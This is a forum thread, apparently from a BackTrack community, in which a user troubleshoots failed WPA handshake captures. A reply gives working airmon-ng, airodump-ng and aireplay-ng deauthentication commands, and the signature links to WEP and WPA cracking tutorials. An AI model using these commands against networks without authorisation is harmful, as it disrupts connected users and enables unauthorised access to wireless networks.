Results 1 to 2 of 2

Thread: WEP/WPA Deauth issues

  1. #1

    Default WEP/WPA Deauth issues

    Hi,

    Hope this is in the right section, I've recently installed BT3 onto my hard drive

    when testing wep or wpa, I get the below issues, in this case it's WPA

    when I type
    aireplay-ng -0 1 -e ESSID -a router -c station ath0
    I get below, i press up key to retype the same command some times this can take about
    6 times & it will eventually Send DeAuth to station, but 1/5 times it will give handshake,
    the rest of the times it will disconnect my other laptop that's physically connected & either give limited
    or no connectivity, or it will auto reconnect, but the time that it takes to reconnect, I dont get handshake
    Does my card need to be set on a channel to match the AP, is there a way around this, as i've never
    experienced issues with BT2, & also that was just running from a live cd, cheers for looking guys

    11:22:00 ath0 is on channel 7, but the AP uses channel 1
    bt ~ # aireplay-ng -0 1 -e ESSID -a router -c station ath0
    11:22:01 Waiting for beacon frame (BSSID: router) on channel 4
    11:22:03 ath0 is on channel 4, but the AP uses channel 1
    bt ~ # aireplay-ng -0 1 -e ESSID -a router -c station ath0
    11:22:58 Waiting for beacon frame (BSSID: router) on channel 1
    11:22:59 Sending DeAuth to station -- STMAC: [station]

  2. #2
    Senior Member
    Join Date
    Apr 2007
    Posts
    3,385

    Default

    Quote Originally Posted by samsung View Post
    Hi,

    Hope this is in the right section, I've recently installed BT3 onto my hard drive

    when testing wep or wpa, I get the below issues, in this case it's WPA

    when I type
    aireplay-ng -0 1 -e ESSID -a router -c station ath0
    I get below, i press up key to retype the same command some times this can take about
    6 times & it will eventually Send DeAuth to station, but 1/5 times it will give handshake,
    the rest of the times it will disconnect my other laptop that's physically connected & either give limited
    or no connectivity, or it will auto reconnect, but the time that it takes to reconnect, I dont get handshake
    Does my card need to be set on a channel to match the AP, is there a way around this, as i've never
    experienced issues with BT2, & also that was just running from a live cd, cheers for looking guys

    11:22:00 ath0 is on channel 7, but the AP uses channel 1
    bt ~ # aireplay-ng -0 1 -e ESSID -a router -c station ath0
    11:22:01 Waiting for beacon frame (BSSID: router) on channel 4
    11:22:03 ath0 is on channel 4, but the AP uses channel 1
    bt ~ # aireplay-ng -0 1 -e ESSID -a router -c station ath0
    11:22:58 Waiting for beacon frame (BSSID: router) on channel 1
    11:22:59 Sending DeAuth to station -- STMAC: [station]
    Theres your problem little brother. Your channel hopping. Haven't you watched my WPA cracking videos?? Their the 3rd and 4th link in my sigggy. Watch them. You have an Atheros chipped card as well, so do everything that I do in that video and follow it precisely. DON'T SKIP ANYTHING!!

    1st, you need to use

    Code:
    airmon-ng stop ath0
    Code:
    airmon-ng start wifi0 1
    that will put your card on channel 1


    and your airodump-ng command line should look like this...


    Code:
    airodump-ng -c 1 -w psk --bssid APmacHERE ath0
    now do your

    Code:
    aireplay-ng -0 5 -e ESSID -a router -c station ath0

    And I bet you that you get a handshake every time.
    [CENTER][FONT=Book Antiqua][SIZE=5][B][COLOR=blue][FONT=Courier New][COLOR=red]--=[/COLOR][/FONT]Xploitz[FONT=Courier New][COLOR=red]=--[/COLOR][/FONT][/COLOR][/B][/SIZE][/FONT][FONT=Courier New][COLOR=Black][SIZE=6][B] ®[/B][/SIZE][/COLOR][/FONT][/CENTER]
    [CENTER][SIZE=4][B]Remote-Exploit.orgs Master Tutorialist.[/B][/SIZE][SIZE=6][B]™
    [/B][/SIZE]
    [URL="http://forums.remote-exploit.org/showthread.php?t=9063"][B]VIDEO: Volume #1 "E-Z No Client WEP Cracking Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=7872"][B]VIDEO: Volume #2 "E-Z No Client Korek Chopchop Attack Tutorial"[/B]
    [/URL]
    [URL="http://forums.remote-exploit.org/showthread.php?t=8230"][B]VIDEO: Volume #3 "E-Z WPA/WPA2 Cracking Tutorial"[/B][/URL]

    [URL="http://forums.remote-exploit.org/showthread.php?t=8041"][B]VIDEO: Volume #4 "E-Z Cracking WPA/WPA2 With Airolib-ng Databases"[/B][/URL]
    [/CENTER]

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •